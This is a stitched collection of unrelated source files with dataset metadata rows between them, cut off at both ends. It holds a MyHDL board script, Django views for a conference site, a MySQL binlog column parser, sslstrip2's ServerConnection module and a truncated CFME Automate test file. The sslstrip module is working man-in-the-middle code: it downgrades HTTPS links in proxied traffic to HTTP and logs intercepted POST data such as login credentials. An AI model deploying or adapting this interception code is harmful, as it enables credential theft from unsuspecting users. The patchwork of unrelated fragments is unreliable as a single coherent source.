'i2c_sclk': Signal(bool(1)),
'i2c_sdat': TristateSignal(bool(0)),
'g_sensor_cs_n': Signal(bool(1)),
'g_sensor_int': Signal(bool(1)),
'lcd_on': Signal(bool(1)),
'lcd_resetn': Signal(bool(1)),
'lcd_csn': Signal(bool(1)),
'lcd_rs': Signal(bool(1)),
'lcd_wrn': Signal(bool(1)),
'lcd_rdn': Signal(bool(1)),
'lcd_data': Signal(intbv(0)[16:])
}
def build():
global brd, flow
brd = get_board('de0nano')
flow = brd.get_flow(top=de0nano_converters)
flow.run()
def program():
if flow is not None:
flow.program()
if __name__ == '__main__':
build()
program()
| mit | -4,251,928,756,813,380,000 | 28.920863 | 72 | 0.620101 | false |
enjaz/enjaz | newhpc/views.py | 2 | 14753 | # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.shortcuts import get_object_or_404
from django.views.decorators import csrf
from django.http import JsonResponse
from django.shortcuts import render
from core import decorators
from .models import FaqCategory, FaqQuestion, BlogPostArabic, BlogPostEnglish, NewsletterMembership, BlogVideo, Speaker
from .forms import *
from events.models import Event, Session, TimeSlot,SessionRegistration
from django.utils import timezone
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.core.urlresolvers import reverse
import events.utils
from django.contrib.auth.models import User
# enjazportal.com/riyadh HPC Riyadh :
def riy_ar_index(request):
speakers = Speaker.objects.filter(is_top_speaker=True, version__year='2020')
context = {'speakers':speakers,}
return render(request,'newhpc/arabic/riy_ar_index.html',context)
def riy_en_index(request):
speakers = Speaker.objects.filter(is_top_speaker=True, version__year='2020')
context = {'speakers': speakers, }
return render(request,'newhpc/english/riy_en_index.html',context)
def riy_coming_soon(request):
context = {}
return render(request,'newhpc/arabic/riy_coming_soon.html',context)
# def riy_ar_registration(request):
# context = {}
# return render(request,'newhpc/arabic/riy_ar_registeration.html',context)
@login_required
def riy_ar_registration(request,event_city):
if event_city == 'riyadh':
event = Event.objects.get(code_name='hpc2020-r')
template = 'newhpc/arabic/riy_ar_eng_registeration_test.html'
elif event_city == 'jeddah':
event = Event.objects.get(code_name='hpc2020-j')
template = 'newhpc/english/jeddah/jed_en_registration.html'
elif event_city == 'alahsa':
event = Event.objects.get(code_name='hpc2020-a')
template ='newhpc/english/alahsa/ahs_en_registration.html'
timeslots = TimeSlot.objects.filter(event=event ,parent__isnull=True)
session = Session.objects.get(event=event, code_name='general')
registration = request.user.session_registrations.filter(session__event=event, session__code_name='general').first()
if registration:
registred_to_program = True
else :
registred_to_program = False
if timeslots.filter(image__isnull=False):
have_image = True
else:
have_image = False
barcode_user = request.user
text = ("{:0%s}" % events.utils.BARCODE_LENGTH).format(barcode_user.pk)
qrcode_value = events.utils.get_barcode(text)
user_registrations = request.user.session_registrations.filter(session__event=event,is_deleted=False)
context = {'timeslots': timeslots,
'event': event,
'have_image': have_image,
'registred_to_program': registred_to_program,
'qrcode_value': qrcode_value,
'text': text,
'barcode_user': barcode_user,
'user_registrations':user_registrations
}
if event.registration_opening_date and timezone.now() < event.registration_opening_date and not request.user.is_superuser and not events.utils.is_organizing_team_member(request.user, event) and not events.utils.is_in_entry_team(request.user):
raise Http404
elif event.registration_closing_date and timezone.now() > event.registration_closing_date:
return HttpResponseRedirect(reverse('events:registration_closed',
args=(event.code_name,)))
return render(request, template, context)
@login_required
def register_general_program(request,event_city):
if event_city == 'riyadh':
event = Event.objects.get(code_name='hpc2020-r')
elif event_city == 'jeddah':
event = Event.objects.get(code_name='hpc2020-j')
elif event_city == 'alahsa':
event = Event.objects.get(code_name='hpc2020-a')
session = Session.objects.get(event=event, code_name='general')
registration = SessionRegistration.objects.filter(session=session, user=request.user).first()
if not registration:
registration = SessionRegistration.objects.create(session=session,
user=request.user,
is_approved=True)
return HttpResponseRedirect(reverse('newhpc:riy_ar_registration',
args=(event_city,)))
@login_required
def list_sessions(request, event_code_name, pk):
event = get_object_or_404(Event, code_name=event_code_name)
if event.code_name == 'hpc2020-r':
template = 'newhpc/sessions_list.html'
elif event.code_name == 'hpc2020-j':
template = 'newhpc/english/jeddah/session_list.html'
elif event.code_name == 'hpc2020-a' :
template = 'newhpc/english/alahsa/session_list.html'
timeslot = TimeSlot.objects.get(event=event, pk=pk)
children_total = timeslot.session_set.count() + timeslot.children.count()
if timeslot.limit:
remaining_number = timeslot.limit - request.user.session_registrations.filter(session__time_slot=timeslot,is_deleted=False).count()
else:
remaining_number = 1
limit = events.utils.get_timeslot_limit(timeslot)
context = {'timeslot': timeslot,
'event': event,
'children_total':children_total,
'remaining_number':remaining_number,
'limit':limit}
if event.registration_opening_date and timezone.now() < event.registration_opening_date and \
not request.user.is_superuser and \
not events.utils.is_organizing_team_member(request.user, event) and \
not events.utils.is_in_entry_team(request.user):
raise Http404
elif event.registration_closing_date and timezone.now() > event.registration_closing_date:
return HttpResponseRedirect(reverse('events:registration_closed',
args=(event.code_name,)))
return render(request, template , context)
def riy_en_registration(request):
context = {}
return render(request,'newhpc/english/riy_en_registeration.html',context)
def riy_ar_exhibition(request):
context = {}
return render(request,'newhpc/arabic/riy_ar_exhibition.html',context)
def riy_en_exhibition(request):
context = {}
return render(request,'newhpc/english/riy_en_exhibition.html',context)
def riy_en_research(request):
context = {}
return render(request,'newhpc/english/riy_en_research.html',context)
def show_about(request, lang):
if lang == 'ar':
lang2 = 'arabic'
elif lang == 'en':
lang2 = 'english'
return render(request, 'newhpc/'+lang2+'/riy_'+lang+'_about.html')
@login_required
def add_FaqCategory(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = FaqCategory()
form = FaqCategoryForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = FaqCategoryForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_faq_category.html', context)
@login_required
def add_FaqQuestion(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = FaqQuestion()
form = FaqQuestionForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = FaqQuestionForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_faq_question.html', context)
def list_FAQs(request, lang):
if lang == 'ar':
lang2 = 'arabic'
elif lang == 'en':
lang2 = 'english'
categories = FaqCategory.objects.all()
tech_qs = FaqQuestion.objects.filter(is_tech=True)
non_tech_qs = FaqQuestion.objects.filter(is_tech=False)
faqs = FaqQuestion.objects.all()
context = {'categories': categories,
'tech_qs': tech_qs,
'non_tech_qs': non_tech_qs}
return render(request, 'newhpc/'+lang2+'/'+lang+'_list_FAQ.html', context)
@login_required
def add_prev_version(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = PreviousVersion()
form = PreviousVersionForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = PreviousVersionForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_prev_version.html', context)
@login_required
def add_prev_statistic(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = PreviousStatistics()
form = PreviousStatisticsForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = PreviousStatisticsForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_prev_statistics.html', context)
@login_required
def add_leader(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = HpcLeader()
form = HpcLeaderForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = HpcLeaderForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_leader.html', context)
@login_required
def add_media_sponsor(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = MediaSponser()
form = MediaSponserForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = MediaSponserForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_media_sponsor.html', context)
@login_required
def add_winner(request):
if not request.user.is_superuser:
raise PermissionDenied
if request.method == 'POST':
instance = Winner()
form = WinnerForm(request.POST, instance=instance)
if form.is_valid():
instance = form.save()
elif request.method == 'GET':
form = WinnerForm()
context = {'form' : form}
return render(request, 'newhpc/english/administrative/add_winner.html', context)
def admin_prev_versions(request):
return render(request, 'newhpc/english/administrative/prev_versions.html')
def list_prev_versions(request):
versions = PreviousVersion.objects.all()
context = {'versions': versions}
return render(request, 'newhpc/arabic/ar_prev_versions.html', context)
def show_version(request, version_year):
version = PreviousVersion.objects.get(year=version_year)
speakers = version.speaker_set.filter(is_top_speaker=True)
context = {'version': version,
'speakers': speakers}
return render(request, 'newhpc/arabic/ar_show_version.html', context)
def show_speakers(request, version_year):
version = PreviousVersion.objects.get(year=version_year)
context = {'version': version,
'range': range(2)}
return render(request, 'newhpc/arabic/all_speakers.html', context)
def main_media(request, lang):
if lang == 'ar':
lang2 = 'arabic'
posts = BlogPostArabic.objects.all()
elif lang == 'en':
lang2 = 'english'
posts = BlogPostEnglish.objects.all()
videos = BlogVideo.objects.all()
context = {'posts': posts, 'videos': videos}
return render(request, 'newhpc/'+lang2+'/main_media.html', context)
def show_post(request, lang, post_id):
if lang == 'ar':
lang2 = 'arabic'
post = get_object_or_404(BlogPostArabic, pk=post_id)
elif lang == 'en':
lang2 = 'english'
post = get_object_or_404(BlogPostEnglish, pk=post_id)
context = {'post': post}
return render(request, 'newhpc/'+lang2+'/show_post.html', context)
@decorators.post_only
@decorators.ajax_only
@csrf.csrf_exempt
def handle_newsletter_signup(request):
form = NewsletterMembershipForm(request.POST)
response_data = {}
if form.is_valid():
email = form.cleaned_data['email']
previous_membership = NewsletterMembership.objects.filter(email=email).exists()
if previous_membership:
response_data['message'] = 'previous'
raise Exception("previous")
else:
response_data['message'] = 'success'
form.save()
else:
response_data['message'] = 'invalid'
raise Exception("invalid")
return JsonResponse(response_data)
@login_required
def list_newsletter_members(request):
if not request.user.is_superuser:
raise PermissionDenied
members = NewsletterMembership.objects.all()
context = {'members': members}
return render(request, 'newhpc/english/administrative/list_news_members.html', context)
def show_media_file(request, lang):
return HttpResponseRedirect('/static/static/newhpc/media/file.pdf')
def list_speakers(request, lang):
if lang == 'ar':
lang2 = 'arabic'
elif lang == 'en':
lang2 = 'english'
# TODO: FIx hard code in defining current year for filter
speakers = Speaker.objects.filter(version__year="2020")
context = {'speakers': speakers, 'year': '2020'}
return render(request, 'newhpc/'+lang2+'/riy_list_speakers.html', context)
# enjazportal.com/jeddah HPC Jeddah :
def jed_en_research(request):
context = {}
return render(request,'newhpc/english/jeddah/jed_en_research.html',context)
# enjazportal.com/alahsa HPC Al Ahsa :
def ahs_en_research(request):
context = {}
return render(request,'newhpc/english/alahsa/ahs_en_research.html',context)
def show_abstracts_booklet(request, lang):
return HttpResponseRedirect('/static/static/newhpc/media/abstracts booklet.pdf')
# invite to ceremony
def invite_to_ceremony(request, invitee_id):
try:
invitee = User.objects.get(username=invitee_id)
inv_exists = True
except:
invitee = invitee_id
inv_exists = False
context = {'invitee': invitee, 'inv_exists': inv_exists}
return render(request, 'newhpc/arabic/invite_ceremony.html', context)
| agpl-3.0 | -8,234,721,806,613,222,000 | 37.023196 | 246 | 0.664204 | false |
58daojia-dba/mysqlbinlog_flashback | pymysqlreplication/column.py | 1 | 3452 | # -*- coding: utf-8 -*-
import struct
from .constants import FIELD_TYPE
class Column(object):
"""Definition of a column
"""
def __init__(self, *args, **kwargs):
if len(args) == 3:
self.__parse_column_definition(*args)
else:
self.__dict__.update(kwargs)
def __parse_column_definition(self, column_type, column_schema, packet):
self.type = column_type
self.name = column_schema["COLUMN_NAME"]
self.collation_name = column_schema["COLLATION_NAME"]
self.character_set_name = column_schema["CHARACTER_SET_NAME"]
self.comment = column_schema["COLUMN_COMMENT"]
self.unsigned = column_schema["COLUMN_TYPE"].find("unsigned") != -1
self.type_is_bool = False
self.is_primary = column_schema["COLUMN_KEY"] == "PRI"
if self.type == FIELD_TYPE.VARCHAR:
self.max_length = struct.unpack('<H', packet.read(2))[0]
elif self.type == FIELD_TYPE.DOUBLE:
self.size = packet.read_uint8()
elif self.type == FIELD_TYPE.FLOAT:
self.size = packet.read_uint8()
elif self.type == FIELD_TYPE.TIMESTAMP2:
self.fsp = packet.read_uint8()
elif self.type == FIELD_TYPE.DATETIME2:
self.fsp = packet.read_uint8()
elif self.type == FIELD_TYPE.TIME2:
self.fsp = packet.read_uint8()
elif self.type == FIELD_TYPE.TINY and \
column_schema["COLUMN_TYPE"] == "tinyint(1)":
self.type_is_bool = True
elif self.type == FIELD_TYPE.VAR_STRING or \
self.type == FIELD_TYPE.STRING:
self.__read_string_metadata(packet, column_schema)
elif self.type == FIELD_TYPE.BLOB:
self.length_size = packet.read_uint8()
elif self.type == FIELD_TYPE.GEOMETRY:
self.length_size = packet.read_uint8()
elif self.type == FIELD_TYPE.NEWDECIMAL:
self.precision = packet.read_uint8()
self.decimals = packet.read_uint8()
elif self.type == FIELD_TYPE.BIT:
bits = packet.read_uint8()
bytes = packet.read_uint8()
self.bits = (bytes * 8) + bits
self.bytes = int((self.bits + 7) / 8)
def __read_string_metadata(self, packet, column_schema):
metadata = (packet.read_uint8() << 8) + packet.read_uint8()
real_type = metadata >> 8
if real_type == FIELD_TYPE.SET or real_type == FIELD_TYPE.ENUM:
self.type = real_type
self.size = metadata & 0x00ff
self.__read_enum_metadata(column_schema)
else:
self.max_length = (((metadata >> 4) & 0x300) ^ 0x300) \
+ (metadata & 0x00ff)
def __read_enum_metadata(self, column_schema):
enums = column_schema["COLUMN_TYPE"]
if self.type == FIELD_TYPE.ENUM:
self.enum_values = enums.replace('enum(', '')\
.replace(')', '').replace('\'', '').split(',')
else:
self.set_values = enums.replace('set(', '')\
.replace(')', '').replace('\'', '').split(',')
def __eq__(self, other):
return self.data == other.data
def __ne__(self, other):
return not self.__eq__(other)
def serializable_data(self):
return self.data
@property
def data(self):
return dict((k, v) for (k, v) in self.__dict__.items() if not k.startswith('_'))
| apache-2.0 | -3,951,002,800,386,004,000 | 37.355556 | 88 | 0.554751 | false |
IwraStudios/NoSSL | sslstrip2-master/build/lib.linux-i686-2.7/sslstrip/ServerConnection.py | 10 | 6461 | # Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string, random, zlib, gzip, StringIO
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that
comes back is examined. The headers we dont like are removed, and the links are stripped
from HTTPS to HTTP.
'''
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
urlType = re.compile(r"https://", re.IGNORECASE)
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
# urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
self.urlMonitor = URLMonitor.getInstance()
self.isImageRequest = False
self.isCompressed = False
self.contentLength = None
self.shutdownComplete = False
def getLogLevel(self):
return logging.DEBUG
def getPostPrefix(self):
return "POST"
def sendRequest(self):
logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri))
self.sendCommand(self.command, self.uri)
def sendHeaders(self):
for header, value in self.headers.items():
logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
self.sendHeader(header, value)
self.endHeaders()
def sendPostData(self):
logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))
self.transport.write(self.postData)
def connectionMade(self):
logging.log(self.getLogLevel(), "HTTP connection made.")
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
HTTPClient.handleResponseEnd(self)
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#logging.log(self.getLogLevel(), "Read from server:\n" + data)
logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
self.client.write(data)
self.shutdown()
def replaceSecureLinks(self, data):
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
iter2 = re.finditer(ServerConnection.urlToken1, data)
for match in iter2:
encontrado = match.group()
logging.debug("Token find: "+encontrado+", parsing...")
iter2 = re.finditer(ServerConnection.urlToken2, data)
for match in iter2:
encontrado = match.group()
logging.debug("Token find: "+encontrado+", parsing....")
#data = re.sub(ServerConnection.urlToken2, r'\1?ssltoken=1',data)
#data = re.sub(ServerConnection.urlToken1, r'\1ssltoken=1&',data)
return re.sub(ServerConnection.urlType, 'http://', data)
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
self.client.finish()
self.transport.loseConnection()
| gpl-3.0 | -7,475,276,025,798,142,000 | 36.346821 | 110 | 0.609658 | false |
nachandr/cfme_tests | cfme/tests/automate/test_common_methods.py | 2 | 15900 | """This module contains tests that test the universally applicable canned methods in Automate."""
from datetime import date
from datetime import timedelta
from textwrap import dedent
import fauxfactory
import pytest
from widgetastic.utils import partial_match
from widgetastic_patternfly import CandidateNotFound
from cfme import test_requirements
from cfme.automate.simulation import simulate
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.infrastructure.virtual_machines import InfraVmSummaryView
from cfme.markers.env_markers.provider import ONE
from cfme.provisioning import do_vm_provisioning
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.generators import random_vm_name
from cfme.utils.log import logger
from cfme.utils.log_validator import LogValidator
from cfme.utils.wait import wait_for
from widgetastic_manageiq import Dropdown
pytestmark = [
test_requirements.automate,
pytest.mark.meta(server_roles="+automate"),
pytest.mark.provider([InfraProvider], required_fields=[
['provisioning', 'template'],
['provisioning', 'host'],
['provisioning', 'datastore']
], scope="module")
]
def generate_retirement_date(delta=None):
gen_date = date.today()
if delta:
gen_date += timedelta(days=delta)
return gen_date
@pytest.mark.tier(3)
@pytest.mark.parametrize('create_vm', ['small_template'], indirect=True)
def test_vm_retire_extend(appliance, request, create_vm, soft_assert):
""" Tests extending a retirement using an AE method.
Polarion:
assignee: dgaikwad
casecomponent: Automate
initialEstimate: 1/3h
setup:
1. A running VM on any provider.
testSteps:
1. It creates a button pointing to ``Request/vm_retire_extend`` instance. The button
should live in the VM and Instance button group.
2. Then it sets a retirement date for the VM
3. Then it waits until the retirement date is set
4. Then it clicks the button that was created and it waits for the retirement date to
extend.
Bugzilla:
1627758
"""
num_days = 5
soft_assert(create_vm.retirement_date == 'Never', "The retirement date is not 'Never'!")
retirement_date = generate_retirement_date(delta=num_days)
create_vm.set_retirement_date(when=retirement_date)
wait_for(lambda: create_vm.retirement_date != 'Never', message="retirement date set")
set_date = create_vm.retirement_date
vm_retire_date_fmt = create_vm.RETIRE_DATE_FMT
soft_assert(set_date == retirement_date.strftime(vm_retire_date_fmt),
"The retirement date '{}' did not match expected date '{}'"
.format(set_date, retirement_date.strftime(vm_retire_date_fmt)))
# Create the vm_retire_extend button and click on it
grp_name = fauxfactory.gen_alphanumeric(start="grp_")
grp = appliance.collections.button_groups.create(
text=grp_name,
hover=grp_name,
type=appliance.collections.button_groups.VM_INSTANCE
)
request.addfinalizer(lambda: grp.delete_if_exists())
btn_name = fauxfactory.gen_alphanumeric(start="btn_")
button = grp.buttons.create(
text=btn_name,
hover=btn_name,
system="Request",
request="vm_retire_extend"
)
request.addfinalizer(lambda: button.delete_if_exists())
navigate_to(create_vm, 'Details')
class TestDropdownView(InfraVmSummaryView):
group = Dropdown(grp.text)
view = appliance.browser.create_view(TestDropdownView)
view.group.item_select(button.text)
# CFME automate vm_retire_extend method defaults to extending the date by 14 days
extend_duration_days = 14
extended_retirement_date = retirement_date + timedelta(days=extend_duration_days)
# Check that the WebUI updates with the correct date
wait_for(
lambda: create_vm.retirement_date >= extended_retirement_date.strftime(vm_retire_date_fmt),
num_sec=60,
message="Check for extension of the VM retirement date by {} days".format(
extend_duration_days)
)
@pytest.mark.tier(3)
@pytest.mark.meta(automates=[1720432])
def test_miq_password_decrypt(appliance, klass):
"""
Polarion:
assignee: dgaikwad
casecomponent: Automate
initialEstimate: 1/3h
Bugzilla:
1720432
"""
# Ruby script for decrypting password
script = (
'require "manageiq-password"\n'
f'root_password = {appliance.password_gem}.encrypt("abc")\n'
'$evm.log("info", "Root Password is #{root_password}")\n'
f'root_password_decrypted = {appliance.password_gem}.decrypt(root_password)\n'
'$evm.log("info", "Decrypted password is #{root_password_decrypted}")'
)
# Adding schema for executing method
klass.schema.add_fields({'name': 'execute', 'type': 'Method', 'data_type': 'String'})
# Adding automate method
method = klass.methods.create(
name=fauxfactory.gen_alphanumeric(),
display_name=fauxfactory.gen_alphanumeric(),
location='inline',
script=script)
# Adding instance to call automate method
instance = klass.instances.create(
name=fauxfactory.gen_alphanumeric(),
display_name=fauxfactory.gen_alphanumeric(),
description=fauxfactory.gen_alphanumeric(),
fields={'execute': {'value': method.name}}
)
result = LogValidator(
"/var/www/miq/vmdb/log/automation.log", matched_patterns=[".*Decrypted password is abc.*"],
)
result.start_monitoring()
# Executing method via simulation to check decrypted password
simulate(
appliance=klass.appliance,
attributes_values={
"namespace": klass.namespace.name,
"class": klass.name,
"instance": instance.name,
},
message="create",
request="Call_Instance",
execute_methods=True,
)
assert result.validate()
@pytest.mark.tier(1)
@pytest.mark.customer_scenario
@pytest.mark.meta(automates=[1700524, 1753669])
def test_service_retirement_from_automate_method(request, generic_catalog_item, custom_instance):
"""
Bugzilla:
1700524
1753669
Polarion:
assignee: dgaikwad
initialEstimate: 1/8h
caseposneg: positive
startsin: 5.11
casecomponent: Automate
testSteps:
1. Create service catalog item and order
2. Create a writeable domain and copy ManageIQ/System/Request to this domain
3. Create retire_automation_service instance and set meth5 to retire_automation_service.
4. Create retire_automation_service method with sample code given below:
> service = $evm.root['service']
> $evm.log(:info, "create_retire_request for service #{service}")
> request = $evm.execute(:create_retire_request, service)
> $evm.log(:info, "Create request for create_retire_request #{request}")
5. Execute this method using simulation
expectedResults:
1. Service provision request should be provisioned successfully
2.
3.
4.
5. Service should be retired successfully
"""
# Ordering catalog item and deleting request once service has been reached to 'Finished' state
service_request = generic_catalog_item.appliance.rest_api.collections.service_templates.get(
name=generic_catalog_item.name
).action.order()
request.addfinalizer(lambda: service_request.action.delete())
wait_for(lambda: service_request.request_state == "finished", fail_func=service_request.reload,
timeout=180, delay=10)
# Ruby code to execute create_retire_request
script = dedent(
"""
service = $evm.root['service']
$evm.log(:info, 'create_retire_request for service #{service}')
request = $evm.execute(:create_retire_request, service)
$evm.log(:info, 'Create request for create_retire_request #{request}')
"""
)
instance = custom_instance(ruby_code=script)
with LogValidator(
"/var/www/miq/vmdb/log/automation.log",
matched_patterns=['.*Create request for create_retire_request.*']).waiting(timeout=120):
# Executing automate method
simulate(
appliance=generic_catalog_item.appliance,
target_type="Service",
target_object=f"{generic_catalog_item.name}",
message="create",
request=f"{instance.name}",
execute_methods=True,
)
retire_request = generic_catalog_item.appliance.rest_api.collections.requests.get(
description=f"Service Retire for: {generic_catalog_item.name}")
wait_for(lambda: retire_request.request_state == "finished", fail_func=retire_request.reload,
timeout=180, delay=10)
@pytest.fixture
def set_root_tenant_quota(request, appliance):
field, value = request.param
root_tenant = appliance.collections.tenants.get_root_tenant()
view = navigate_to(root_tenant, "ManageQuotas")
reset_data = view.form.read()
root_tenant.set_quota(**{f'{field}_cb': True, field: value})
yield
root_tenant.set_quota(**reset_data)
@pytest.mark.tier(3)
@pytest.mark.meta(automates=[1334318])
@pytest.mark.provider([RHEVMProvider], selector=ONE)
@pytest.mark.parametrize(
"set_root_tenant_quota", [("memory", "1000")], indirect=["set_root_tenant_quota"],
ids=["memory"]
)
def test_automate_quota_units(setup_provider, provider, request, appliance, set_root_tenant_quota,
provisioning):
"""
Bugzilla:
1334318
Polarion:
assignee: dgaikwad
casecomponent: Automate
caseimportance: low
initialEstimate: 1/4h
tags: automate
"""
vm_name = random_vm_name(context='quota')
prov_data = {
"catalog": {'vm_name': vm_name},
"environment": {'automatic_placement': True},
"network": {'vlan': partial_match(provisioning['vlan'])},
'hardware': {'memory': '2048'},
}
@request.addfinalizer
def _finalize():
collection = appliance.provider_based_collection(provider)
vm_obj = collection.instantiate(vm_name, provider, provisioning["template"])
try:
vm_obj.cleanup_on_provider()
except Exception:
logger.warning('Failed deleting VM from provider: %s', vm_name)
with LogValidator(
"/var/www/miq/vmdb/log/automation.log",
matched_patterns=['.*Getting Tenant Quota Values for:.*.memory=>1073741824000.*'],
).waiting(timeout=120):
# Provisioning VM via lifecycle
do_vm_provisioning(appliance, template_name=provisioning["template"], provider=provider,
vm_name=vm_name, provisioning_data=prov_data, wait=False, request=None)
# nav to requests page to check quota validation
request_description = f'Provision from [{provisioning["template"]}] to [{vm_name}]'
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
assert provision_request.is_succeeded(
method="ui"
), f"Provisioning failed: {provision_request.row.last_message.text}"
@pytest.fixture(scope="function")
def vm_folder(provider):
"""Create Vm folder on VMWare provider"""
folder = provider.mgmt.create_folder(fauxfactory.gen_alphanumeric(
start="test_folder_", length=20)
)
yield folder
fd = folder.Destroy()
wait_for(lambda: fd.info.state == 'success', delay=10, timeout=150)
@pytest.mark.tier(3)
@pytest.mark.ignore_stream("5.10")
@pytest.mark.provider([VMwareProvider], selector=ONE)
@pytest.mark.meta(automates=[1716858])
@pytest.mark.parametrize('create_vm', ['small_template'], indirect=True)
def test_move_vm_into_folder(appliance, vm_folder, create_vm, custom_instance):
"""
Bugzilla:
1716858
Polarion:
assignee: dgaikwad
casecomponent: Automate
initialEstimate: 1/4h
tags: automate
"""
script = dedent(
f"""
vm = $evm.vmdb('vm').find_by_name('{create_vm.name}')
folder = $evm.vmdb('EmsFolder').find_by(:name => '{vm_folder.name}')
vm.move_into_folder(folder) unless folder.nil?
"""
)
instance = custom_instance(ruby_code=script)
view = navigate_to(create_vm, "Details")
tree_path = view.sidebar.vmstemplates.tree.currently_selected
simulate(
appliance=appliance,
attributes_values={
"namespace": instance.klass.namespace.name,
"class": instance.klass.name,
"instance": instance.name,
},
message="create",
request="Call_Instance",
execute_methods=True,
)
# manipulate tree path. Remove folder - 'Templates' and append with vm_folder name
tree_path.pop()
tree_path.append(vm_folder.name)
# Navigating to Vms details page and checking folder of the Vm in accordion of CFME UI
view = navigate_to(create_vm, "Details")
# Checking new folder appeared
def _check():
try:
view.sidebar.vmstemplates.tree.fill(tree_path)
return True
except CandidateNotFound:
return False
wait_for(lambda: _check, fail_func=view.browser.refresh, timeout=600, delay=5,
message="Waiting for vm folder name to appear")
@pytest.mark.tier(1)
@pytest.mark.meta(automates=[1574444])
@pytest.mark.provider([VMwareProvider], selector=ONE)
def test_list_of_diff_vm_storages_via_rails(appliance, setup_provider, provider, testing_vm,
custom_instance):
"""
Bugzilla:
1574444
Polarion:
assignee: dgaikwad
initialEstimate: 1/8h
caseimportance: medium
caseposneg: positive
testtype: functional
startsin: 5.9
casecomponent: Automate
testSteps:
1. vmware = $evm.vmdb('ems').find_by_name('vmware 6.5 (nested)') ;
2. vm = vmware.vms.select { |v| v.name == 'dgaikwad-cfme510' }.first ;
3. vm.storage
4. vm.storages
expectedResults:
1.
2.
3. Returns only one storage
4. Returns available storages
"""
list_storages = dedent(
f'vmware = $evm.vmdb("ems").find_by_name("{provider.name}")\n'
'vm = vmware.vms.select {|v| v.name == '
f'"{testing_vm.name}"'
'}.first\n'
'storage = vm.storage\n'
'storage_name = storage.name\n'
